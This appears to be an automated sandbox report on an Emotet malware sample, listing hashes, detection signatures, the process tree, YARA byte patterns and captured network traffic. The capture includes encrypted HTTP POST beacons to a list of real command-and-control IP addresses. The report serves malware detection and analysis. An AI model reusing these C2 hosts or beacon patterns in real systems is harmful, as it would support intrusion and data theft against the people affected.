Loading ...

Play interactive tourEdit tour

Analysis Report sample.exe.exe

Overview

General Information

Sample Name:sample.exe.exe
Analysis ID:379239
MD5:ecbc4b40dcfec4ed1b2647b217da0441
SHA1:e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Found large amount of non-executed APIs
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • sample.exe.exe (PID: 4724 cmdline: 'C:\Users\user\Desktop\sample.exe.exe' MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • sample.exe.exe (PID: 772 cmdline: C:\Users\user\Desktop\sample.exe.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • svchost.exe (PID: 3980 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • videowlan.exe (PID: 580 cmdline: C:\Windows\SysWOW64\videowlan.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • videowlan.exe (PID: 5296 cmdline: C:\Windows\SysWOW64\videowlan.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • svchost.exe (PID: 1748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6020 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6096 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5480 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4904 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3012 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5468 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5448 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 7064 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6224 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6640 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6752 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sample.exe.exeJoeSecurity_EmotetYara detected EmotetJoe Security
    sample.exe.exeEmotetEmotet Payloadkevoreilly
    • 0x16f0:$snippet1: FF 15 F8 C1 40 00 83 C4 0C 68 40 00 00 F0 6A 18
    • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 40 00 85 C0

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000000.202634160.0000000000C51000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000003.00000002.204575479.0000000000C51000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000000.204137551.0000000000C51000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000001.00000002.204686591.0000000000C51000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            00000000.00000002.197198753.0000000000C51000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.2.videowlan.exe.c50000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                4.2.videowlan.exe.c50000.0.unpackEmotetEmotet Payloadkevoreilly
                • 0x16f0:$snippet1: FF 15 F8 C1 C5 00 83 C4 0C 68 40 00 00 F0 6A 18
                • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 C5 00 85 C0
                1.2.sample.exe.exe.c50000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  1.2.sample.exe.exe.c50000.0.unpackEmotetEmotet Payloadkevoreilly
                  • 0x16f0:$snippet1: FF 15 F8 C1 C5 00 83 C4 0C 68 40 00 00 F0 6A 18
                  • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 C5 00 85 C0
                  4.0.videowlan.exe.c50000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Click to see the 11 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: sample.exe.exeAvira: detected
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: sample.exe.exeVirustotal: Detection: 78%Perma Link
                    Source: sample.exe.exeReversingLabs: Detection: 96%
                    Machine Learning detection for sampleShow sources
                    Source: sample.exe.exeJoe Sandbox ML: detected
                    Source: sample.exe.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 167.114.153.153:443 -> 192.168.2.3:49752 version: TLS 1.2
                    Source: sample.exe.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: global trafficTCP traffic: 192.168.2.3:49725 -> 193.169.54.12:8080
                    Source: global trafficTCP traffic: 192.168.2.3:49737 -> 173.230.145.224:8080
                    Source: global trafficTCP traffic: 192.168.2.3:49740 -> 80.86.91.232:7080
                    Source: global trafficTCP traffic: 192.168.2.3:49753 -> 80.82.115.164:4143
                    Source: global trafficTCP traffic: 192.168.2.3:49754 -> 71.244.60.231:4143
                    Source: global trafficTCP traffic: 192.168.2.3:49760 -> 186.103.199.252:4143
                    Source: global trafficTCP traffic: 192.168.2.3:49762 -> 159.203.94.198:4143
                    Source: Joe Sandbox ViewIP Address: 178.62.39.238 178.62.39.238
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 436Connection: Keep-AliveCache-Control: no-cacheData Raw: 7b 60 06 d1 44 a5 d6 e2 88 48 bf 43 38 5e e0 29 73 bc 94 ef 47 0e 26 50 73 f5 61 5e 1e fd ab c1 56 bb 26 46 4e bc a8 10 ae 67 12 4d 61 10 96 f7 9c 41 c4 71 4b 45 b0 27 b0 1d c3 d3 30 10 09 05 6c 57 7b c7 15 3e d8 72 b4 68 52 84 30 29 f3 d0 31 24 2f 16 54 8b 91 c3 8b 3b bc 0a 1b 1c ea 1d 69 cc ed 4f dd dd 75 7b 53 72 de 1a fe be 9a 32 49 68 da 46 5d 1b 5d 0b b4 b0 0b ca 0a 2e 91 5e d6 f1 2f f3 9e 5f 4d 3c 1d c2 e8 8f f0 e6 f1 cd c2 38 65 20 25 cc e3 2f 79 9e be 9c 0b b0 5a 77 9f 2d f8 f3 6b 14 41 a1 37 d9 ea 08 fe 01 53 94 98 35 d9 ae aa c9 7f ba 46 11 8d 4d 42 c2 d0 35 31 1d 11 e3 ef c1 e4 b1 2a 5e 52 2e 46 a1 2a 23 84 2c 3e 31 ff eb 6f f0 6c 89 46 28 5a c9 87 0d c7 05 74 29 52 f2 ac 3a 76 ca 32 37 b4 0f ec 2d df 3d bf 54 be 3a 03 fd c8 90 f8 09 15 0d 9f 8f 77 2d 93 58 c1 c8 b4 33 7f cc de 29 37 2f 26 f5 ca 2b d0 5d d8 dc f5 09 73 66 4d 68 0d d6 10 f1 50 56 df 5c 25 29 f2 7b e0 54 04 c9 36 88 07 b8 9d 4c d4 dc 64 c9 be e4 33 40 40 41 7b 0a 62 15 e0 ad 48 a7 85 ee bc 6b 25 93 dd a5 5e 68 d5 ea cb 1f 96 23 96 d1 66 1e af a7 d6 38 35 b5 a2 67 af 72 c4 00 16 5f 75 ad 1a 58 61 49 4b 2d f5 1f 9b 12 b6 14 2b cd 47 01 53 51 a8 18 a2 be 3c f2 b6 cb 11 7d 23 f5 0a b7 59 d2 c8 9f a3 0e 7d bf c0 e4 0f af a2 4d 48 e3 df 84 ce 33 f5 9e 92 eb 7b 30 0e c0 f6 d6 24 27 e1 a5 4f f6 0b 46 7c 59 26 73 68 1f Data Ascii: {`DHC8^)sG&Psa^V&FNgMaAqKE'0lW{>rhR0)1$/T;iOu{Sr2IhF]].^/_M<8e %/yZw-kA7S5FMB51*^R.F*#,>1olF(Zt)R:v27-=T:w-X3)7/&+]sfMhPV\%){T6Ld3@@A{bHk%^h#f85gr_uXaIK-+GSQ<}#Y}MH3{0$'OF|Y&sh
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 167.114.153.153Content-Length: 452Connection: Keep-AliveCache-Control: no-cacheData Raw: 51 a6 7d 82 5d 0e c0 4e ed 0c 27 aa 8c 7b f7 0e 82 df 35 5e 05 91 ba 3e f3 2f 98 65 aa a6 22 0c bf 53 c7 96 fd 6d fe c4 ea c5 9a b0 0b 17 15 eb e2 d0 4d 9d a3 9c 56 e1 39 12 7d 7a 1e 34 6c 4a 71 46 e5 e2 cd 79 b2 55 89 93 92 1b fd 1b d2 0d 4a 67 08 57 2e 12 90 eb 9c 38 64 10 e1 2d 72 7d 75 3c 65 2a ac 7a 11 96 d0 d7 25 4f 26 3d d3 61 b8 11 e2 c8 2c a4 5d f9 e7 94 f8 fb aa f7 b4 9d 12 6d c0 6f cf 5b 84 da bd 22 88 13 c5 21 16 dc b1 08 ef eb 39 b3 2d 41 42 89 72 6e 43 83 fe 73 95 72 34 4c 3b 1c 02 7e e9 c6 51 49 a7 98 d1 33 c9 c8 d1 f1 15 65 bc 99 13 40 01 27 b0 55 f9 c1 28 6c ab 21 ae e1 3b 57 64 0f 23 9a 9f 0d 48 0d de 7f ac e1 b1 ea 2a fb 6b 08 b2 70 95 e7 43 e8 dc 1d 60 c5 e2 c0 24 ac 78 dd b7 50 f8 3f 7d fc 2d ed 11 1e 8f 5a e1 95 f9 c2 81 b8 ca b5 75 d1 75 28 c7 3b 73 fb 41 44 b9 5e a5 b8 88 24 cd 23 12 bc c5 00 a6 78 f8 0d b3 2f c1 4e 29 b1 65 95 b9 f8 5e a2 e5 83 49 b0 89 c8 81 c5 d9 4f 36 3f b5 c9 86 e9 f6 18 49 d7 3f bb f8 06 ff 12 5e 3b cd 7b 09 93 52 1b 11 bc ff 6a cc 6f af 13 3f 41 74 c2 70 a0 2f b6 93 f6 e4 0c d3 62 ab 2d 69 ab d0 27 b9 da 54 9e 97 ab 66 9a 25 a5 04 14 c9 11 f4 da 9a 6c 78 fd dc 88 0d 98 af ee 07 15 0a 88 13 80 1b 0f fe 88 d5 5f a7 db 58 26 49 50 b3 a3 48 38 57 02 3d 22 3e bc 6f d9 14 7d 3a 8e 97 a3 fc 0a cc f9 c5 9b 97 64 78 7a 9f 99 5d e9 d3 36 12 ce a9 56 31 4f 61 d7 22 47 f3 d3 c0 76 2f 9d 0d 23 d8 2d Data Ascii: Q}]N'{5^>/e"SmMV9}z4lJqFyUJgW.8d-r}u<e*z%O&=a,]mo["!9-ABrnCsr4L;~QI3e@'U(l!;Wd#H*kpC`$xP?}-Zuu(;sAD^$#x/N)e^IO6?I?^;{Rjo?Atp/b-i'Tf%lx_X&IPH8W=">o}:dxz]6V1Oa"Gv/#-
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 178.62.39.238:443Content-Length: 420Connection: Keep-AliveCache-Control: no-cacheData Raw: 36 87 63 be ab 4d 11 9a 8d e5 ae 30 8f 03 f4 ed 2f b2 5d 71 22 94 08 55 72 b7 23 60 88 82 58 bc a5 a1 a6 ee 67 d2 b9 c7 a2 75 f2 be 20 ca 5a 1e 72 3c 32 34 49 9d 8d da b0 c4 17 29 6f bc 3b 25 bc f6 35 5b ac b1 1d 6e 5b 72 e1 b7 d0 ff 24 e6 66 d1 eb cc 8c 4c 48 04 bd bb ba c7 c0 50 2a c3 a1 a8 07 ed 2d ee 36 10 7c eb 4f 94 bf 3c f3 2c d7 e8 47 38 6b 1b c7 40 e9 fb 6b d4 06 8f 17 7d 79 88 fa 04 3e 43 80 05 27 64 f8 f2 e9 a3 99 78 20 22 d9 d8 02 c0 c8 8a 3c ec 72 2e 24 da dc cc 73 b9 0e c1 04 e4 2c 14 cd 78 4d 80 15 7d 40 93 36 64 45 bc ca b8 3b 36 30 3c 75 a4 32 e3 13 b0 6d 96 66 c3 6b 3d 83 27 9b ce 35 cc bf 7d 45 c6 68 8b 68 22 af be f7 21 32 3a f1 4d 77 c3 eb 49 51 d4 5d c4 c3 43 3d af 25 8a d2 9e 0b 5e 62 b8 23 96 52 87 ab 9f 99 76 c3 4c ca 04 8e 13 76 97 66 df 65 e3 e3 30 00 26 0d 50 4b 07 9d fe 28 0e d7 90 e4 88 18 54 af c8 99 cc a4 b7 55 2d bf 8f 74 3b cf 2a 29 c2 62 81 51 a3 85 7e 7f 38 9f 93 b1 48 03 7c be ac d5 d3 13 4e a3 2e 84 20 79 8e 43 13 3e 3e 6e 5b d3 eb 66 66 e8 4f 31 60 ae a1 ab 63 a2 0f 95 f1 e9 eb ae 2f 88 89 62 81 e1 a3 1d 7f 68 60 bc c7 90 b7 6a de a4 42 bb 93 e5 18 93 e7 3a 23 ea 68 67 9a 45 03 40 44 d8 65 22 c5 70 3a b0 a9 80 0e f3 ba 6d ec 58 94 57 e6 b3 34 c0 07 4a 52 e6 20 83 d1 99 36 a7 a7 d1 34 31 7d 40 3d d7 36 Data Ascii: 6cM0/]q"Ur#`Xgu Zr<24I)o;%5[n[r$fLHP*-6|O<,G8k@k}y>C'dx "<r.$s,xM}@6dE;60<u2mfk='5}Ehh"!2:MwIQ]C=%^b#RvLvfe0&PK(TU-t;*)bQ~8H|N. yC>>n[ffO1`c/bh`jB:#hgE@De"p:mXW4JR 641}@=6
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 420Connection: Keep-AliveCache-Control: no-cacheData Raw: 58 bc bb 04 e4 14 85 db 8c 7d 08 8e 27 65 5d 4e ae 1d 58 2d 51 a0 e8 a4 83 99 e8 9c 62 6c 71 ae 52 f9 a7 e8 7f f9 52 42 f9 0b 1e 03 0a 56 0b d2 6c 61 13 e2 2b 87 b8 ea 61 49 e7 e5 44 33 c5 ea 43 e4 55 ce 23 77 f9 5e 6e e1 8d f9 d3 3e 2a 9d 10 59 db 1c 3f f6 8d 2f e6 5e d3 09 3b 57 e1 20 ee b6 a0 61 fe ea cf ce 03 d7 a4 7f f7 45 3f 1c 86 88 e0 d6 22 20 45 81 8b 0e 03 d3 89 c7 2b 44 97 26 68 dd 44 44 73 01 b1 b5 57 b3 54 ad 1a 56 4c 6a f3 86 be c6 9a 3a f5 56 6a 17 7b 5d ac 2a 33 32 75 dd 41 eb ac 2d 0d 23 87 b6 c1 71 4e 0b 80 be c4 92 e6 2b 3c e3 9e ab e4 5b 83 da b6 9e 77 cc 49 48 6a 4b 2c fb d2 da d0 12 89 32 5f 6e 18 c7 e6 3a 3f 37 5c 7b ed 2c 00 c2 30 2c f8 e7 6c 5e 39 de eb 91 13 35 04 f2 80 37 7b f9 7f 96 8d 8c e3 ee 42 97 bb 5f 8c ee 3b 2f 6e 10 a2 6c 66 38 df c4 29 70 ba 0c 7e 25 d6 67 a2 82 4c 90 30 5a 7b 98 cd 64 a3 d3 f7 d3 83 22 cb 4b fe c2 fc 9e 2f a7 6f 38 a4 1d e4 9c 6b 2f 49 d8 15 0e 05 d7 53 a1 fc 04 44 3b 73 19 87 c6 26 0b 95 fb 9a e4 0b 36 06 17 e2 fc f9 0c f8 eb 15 93 3a ea da e8 b3 2e b8 ad 00 c7 13 70 ef 87 26 3a 94 b2 e8 fa 54 95 d7 6a 9e f0 15 2a 51 37 eb e5 06 ad e7 9b 7b 89 1e 60 c4 10 69 e6 90 25 f1 d5 b3 5e 9e a3 ca 70 52 60 32 6c 0c ad b6 a3 a3 83 c6 08 f0 bc 0c 19 53 a7 80 31 ef 10 00 27 e4 33 7e 8a d0 65 f2 f3 Data Ascii: X}'e]NX-QblqRRBVla+aID3CU#w^n>*Y?/^;W aE?" E+D&hDDsWTVLj:Vj{]*32uA-#qN+<[wIHjK,2_n:?7\{,0,l^957{B_;/nlf8)p~%gL0Z{d"K/o8k/ISD;s&6:.p&:Tj*Q7{`i%^pR`2lS1'3~e
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.232
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.232
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.232
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.82.115.164
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.82.115.164
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.82.115.164
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 71.244.60.231
                    Source: unknownTCP traffic detected without corresponding DNS query: 71.244.60.231
                    Source: unknownTCP traffic detected without corresponding DNS query: 71.244.60.231
                    Source: unknownTCP traffic detected without corresponding DNS query: 186.103.199.252
                    Source: unknownTCP traffic detected without corresponding DNS query: 186.103.199.252
                    Source: unknownTCP traffic detected without corresponding DNS query: 186.103.199.252
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.187.4.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.187.4.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.187.4.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 159.203.94.198
                    Source: unknownTCP traffic detected without corresponding DNS query: 159.203.94.198
                    Source: unknownTCP traffic detected without corresponding DNS query: 159.203.94.198
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: svchost.exe, 00000021.00000003.571037880.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
                    Source: svchost.exe, 00000021.00000003.571037880.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
                    Source: svchost.exe, 00000021.00000003.571037880.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-03-30T14:41:57.9016760Z||.||a2c1be1c-1f7b-4188-b36e-f57b9066932b||1152921505693336001||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
